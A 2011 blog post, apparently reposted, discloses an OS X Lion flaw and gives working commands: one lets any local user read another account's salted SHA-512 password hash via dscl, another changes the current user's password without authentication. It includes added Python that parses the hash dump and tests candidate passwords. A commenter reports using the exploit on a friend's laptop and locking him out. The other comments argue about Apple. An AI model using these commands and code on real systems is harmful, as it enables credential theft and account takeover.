Sunday, September 18, 2011

Apple Makes Cracking OS X Lion Passwords Easier Than Ever

from DefenseIndepth
You are now root!
In 2009 I posted an article on Cracking Mac OS X passwords. Whilst this post has been quite popular, it was written for OS X 10.6 and prior. Since the release of Mac OS X Lion (10.7) in July, I have received numerous requests for an update. Typically, I would have just updated the existing article without the need for a new post. However, during my research I discovered something interesting about OS X Lion that I'd like to share.

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user's GeneratedUID and then use that ID to extract hashes from a specific user's shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit with a few technical differences). Each user has their own shadow file, stored as a .plist file under /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is one that can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

If we invoke a directory services listing on user bob by specifying the /Local/ path we can see bob's standard profile information:

$ dscl localhost -read /Local/Default/Users/bob

This provides us with nothing too exciting. However, if we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:

dsAttrTypeNative:ShadowHashData:

62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 and the salt is stored from bytes 28-31. For more information on these hashes please see this thread.

This ShadowHashData attribute actually contains the same hash stored in user bob's shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user's profile.

Due to Lion's relatively short time on the market, I have yet to find any of the major crackers supporting OS X Lion hashes (SHA512 + 4-byte salt). To simplify the cracking of these hashes I have created a simple python script which can be downloaded here.
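As an added example (not part of the original article, and not the author's downloadable script), the following Python decodes the dscl output quoted above: it pulls the hex under dsAttrTypeNative:ShadowHashData, parses the embedded binary plist, and splits the SALTED-SHA512 payload into the 4-byte salt and 64-byte digest the note describes. It also implements the comparison a login routine performs, SHA-512 over the salt followed by the password, which is the scheme Lion used for this attribute. The function names, the constructed fixture account (its password and salt are chosen here) and the attribute-absent case are assumptions of the example. The point for a defender is that this is a single fast hash with a four-byte salt and no iteration, so once the attribute is readable the cost of testing candidates is trivial; the absent-attribute branch returning None is the result you want when auditing what a non-root caller can read of another account.

```python
import hashlib
import hmac
import plistlib

# dscl output from the article (bob's account), reproduced as printed on the page.
DSCL_OUTPUT = """\
dsAttrTypeNative:ShadowHashData:
 62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060
"""

SALT_LEN = 4
DIGEST_LEN = hashlib.sha512().digest_size  # 64 bytes


def extract_shadow_hash_data(dscl_output):
    """Return the raw ShadowHashData bytes from `dscl -read` output, or None
    when the attribute is not present in the output at all."""
    lines = dscl_output.splitlines()
    for i, line in enumerate(lines):
        if line.strip() == "dsAttrTypeNative:ShadowHashData:":
            hex_tokens = []
            # dscl prints the value on the following line(s); the next
            # attribute line is recognisable by its colon.
            for following in lines[i + 1:]:
                if ":" in following:
                    break
                hex_tokens.extend(following.split())
            return bytes.fromhex("".join(hex_tokens))
    return None


def split_salted_sha512(shadow_hash_data):
    """Decode the binary plist inside ShadowHashData and return (salt, digest).

    Lion stores a dictionary whose SALTED-SHA512 value is 68 bytes:
    a 4-byte salt followed by the 64-byte SHA-512 digest."""
    plist = plistlib.loads(shadow_hash_data)
    payload = plist["SALTED-SHA512"]
    if len(payload) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(payload))
    return payload[:SALT_LEN], payload[SALT_LEN:]


def salted_sha512(salt, password):
    """Lion's scheme: one SHA-512 over salt || password, no iteration."""
    return hashlib.sha512(salt + password.encode("utf-8")).digest()


def verify_password(shadow_hash_data, candidate):
    """Check one candidate against a ShadowHashData blob, as a login check would."""
    salt, digest = split_salted_sha512(shadow_hash_data)
    return hmac.compare_digest(salted_sha512(salt, candidate), digest)


def build_shadow_hash_data(password, salt):
    """Construct a ShadowHashData blob for a known password (test fixture only,
    not a real account)."""
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be %d bytes" % SALT_LEN)
    payload = salt + salted_sha512(salt, password)
    return plistlib.dumps({"SALTED-SHA512": payload}, fmt=plistlib.FMT_BINARY)


if __name__ == "__main__":
    blob = extract_shadow_hash_data(DSCL_OUTPUT)
    salt, digest = split_salted_sha512(blob)
    print("salt  :", salt.hex())
    print("digest:", digest.hex())
    # Constructed fixture: password and salt chosen here for the round trip.
    fixture = build_shadow_hash_data("constructed-example", b"\x01\x02\x03\x04")
    print("fixture verifies:", verify_password(fixture, "constructed-example"))
```

Running it against the quoted dump yields the salt 74911f72 and a 64-byte digest, matching the byte ranges given in the note above; the fixture round trip confirms the salt-then-password order.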

Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And voilà! You will be prompted to enter a new password without the need to authenticate.


--------------------
Thanks Apple.

14 comments:

  1. Ha ha, Apple sucks again!

  2. It must drive you haters crazy that, despite all the examples of Apple's failings posted on this blog, Apple's popularity continues to snowball...

    Apple Blasts To All-Time High, Now Worth Almost As Much As Microsoft And Google Combined
    http://www.businessinsider.com/apple-continues-rise-2011-9

    The American Customer Satisfaction Index: Apple Aces It, Again
    http://technologizer.com/2011/09/20/apple-satisfaction/

    No company's products are without flaws. It's pretty clear to me that your priorities are quite different from those of the masses who account for Apple's phenomenal growth.

    This password thing will likely cause no real problems before it is fixed in the next minor system update.

  3. "This password thing will likely cause no real problems before it is fixed in the next minor system update."

    Are you kidding? That's a HUGE security flaw!

    With the right technical know-how, and a little tweaking of our friend's python script, thousands (if not MILLIONS) of Mac users could have their credentials reset, resulting in mass chaos when many users are locked "out of the garden."

    And since root access is no longer required, that makes it even easier. This is an issue that needs to be jumped on ASAP, as it only takes seconds for the system to be compromised.

  4. I'm not suggesting that Apple shouldn't (or won't) promptly address the issue. Only stating my opinion that this flaw will not actually affect many (or perhaps any) Mac users.

    We'll see who is right about this... me or the haters. If the sky falls tomorrow you can have the satisfaction of saying you told me so.

  5. I doubt that. Even if the sky falls you'll probably just say the haters are blowing things out of proportion. For reference, take a look at some of the other posts already up on this site.

  6. Lol, yeah, Brett U Jelly? U Mad? I'm the first to say when Windows needs a patch badly or Linux needs to make an improvement, but you're fun to watch. You get soooooo defensive over a multi billion dollar company that doesn't need your help.

  7. Haters DO tend to blow things up out of proportion. Dave says to look at the other postings on this blog. Go ahead. So many of the flaws and criticisms mentioned on this blog HAVE been insignificant. The doomsayers are proven wrong time and again. None of the "-gate" manufactured scandals or the competition's so-called "-killer" products seem to have the anticipated effect. Apple shows no sign of succumbing.

    Unlike Microsoft, which has an army of IT managers forcing whole companies of workers to adopt Windows PCs, Apple has had to win people's hearts one at a time. This despite the constant background of FUD thrown up by haters.

    I sincerely believe that the haters are wrong in this case as well, and that this theoretical exploit, like so many others, never gets out of the lab. I also believe that, regardless, Apple will act quickly to close this vulnerability. (I never said that Apple shouldn't fix it)

    I'm only as defensive as this blog is offensive.

  8. I did look back at some of the other posts. I can clearly see that you're doing what you always do. You say that the documented and proven problems are small and insignificant. The problems are real, the scandals are not manufactured and the articles are not FUD. I don't think this blog is "offensive", it is just pointing out the problems with Apple. Also, you must be joking about the army of IT managers FORCING companies to buy Windows machines. If you believe that you are truly sick in the head.

  9. We obviously disagree on what constitutes a significant problem. I feel that problems that affect relatively few people and/or that are remedied quickly don't justify the alarm that haters seem to exhibit.

    The fact that Apple continues to achieve phenomenal financial success and user satisfaction seems to support my contention that Apple is not having the kind of problems that hurt sales, affect the bottom line adversely, or cause widespread dissatisfaction.

    We also disagree about the role IT managers have had in keeping Apple equipment out of companies. While the situation may have loosened up more recently, I will only say that, in the past, I have personally worked at more than one company with a "No Macs" policy (and I'll bet others have too). Apple appears to have had greater success selling directly to end-users, where corporate gatekeepers do not have veto power.

    Finally, the very name of this blog, Applehaters, is offensive. I also find many of Dave's snarky comments on the articles he cites to be offensive.

  10. Awwww, Dave made Brett cry! Offensive? No. Accurate? Yes. Funny? Absolutely.

    I think everyone finds a giant security hole like that a major problem.

  11. I just upgraded my Mac to Lion and I didn't know anything about this. I agree that it is a major hole in the Mac OS. I sincerely hope Apple comes up with a patch for this soon before the hackers start to exploit it in a big way.

  12. Regarding my hater namesake's assertion that IT Managers haven't been forcing Windows computers on their employees...

    A recent New York Times article discusses what happens when corporate IT policies are loosened up allowing employees to choose their own equipment.

    "Throughout the information age, the corporate I.T. department has stood at the chokepoint of office technology with a firm hand on what equipment and software employees use in the workplace. They are now in retreat. Employees are bringing in the technology they use at home and demanding the I.T. department accommodate them. The I.T. department often complies."

    "...Of the 1,000 or so employees in Citrix’s program, 46 percent have bought Mac computers, according to Paul Martine, Citrix’s chief information officer. 'That was a little bit of a surprise.' ”

    http://tinyurl.com/6dmwsnb

    And regarding the original topic of the password changing exploit, one week later we are still waiting for the sky to fall.

  13. So that's why Macs are not prevalent in the corporate world! All this time, I thought it was Apple's lack of enterprise support over the years that keeps it out of many offices. Turns out it's evil IT Managers and the Iron Fist of Microsoft that keeps it out.

    While I definitely think that end users should have a say about being comfortable with the devices they use, it's our job to make sure said devices work with our environment in a secure way. If an Apple device fits, that's fine. If not, don't start griping how the "IT man is keeping you down." Until Apple plays ball with the IT world and opens its closed system so businesses can suit it to their needs affordably, then it's going to be a rocky road for them.

    As far as the password topic, no one said it was going to be the end of Apple, just that the exploit exists, and that it is there to be taken advantage of. Since people pay good money for the supposed awesome security that Apple says they provide, then this exploit should have been closed immediately. I used this exploit over the weekend on my friend's MacBook, just to show him that the issue exists. Believe me, he thought it was important when he couldn't log on.

    Now if you'll excuse me, I have to go cut a deal with Microsoft. They have our IT Manager captive, and said they're going to start sending fingers if we don't integrate Office 365 into our corporate structure. lol

  14. IT managers aren't the captives. It's the other 99% of the company's employees, the end users, that are forced to use Windows.

    I'm not denying that Microsoft caters to businesses better than Apple, because they certainly do. The things that Microsoft does to make its products attractive to businesses (IT management), are in many cases the same things that make it harder and less pleasant for individuals to manage their own computers. Of course that's what IT people want... systems that require expertise and encourage large IT departments.

    Nevertheless, there are tools available (often from third parties) and ways to support interoperability of Macs in corporate environments. But letting Macs in might require IT to do some research (learn something new), and heaven forbid, require support of multiple platforms. A few decades ago, the saying was "No one ever got fired for specifying IBM". Now IBM has been replaced by Microsoft, as the "safe" standard. IT departments have long been making their own jobs easier and more secure at the expense of end-users, and will naturally attempt to continue to do so.

    As Macs continue to gain market share in the general population, the pressure to accept them into business will only increase, but so will the availability of interoperability and management tools. Leaving aside the arguably superior user experience of Macs, businesses should want to run on a mix of systems (rather than a Microsoft monoculture), if for no other reason than to reduce the chance of a zero day exploit taking down the entire company.
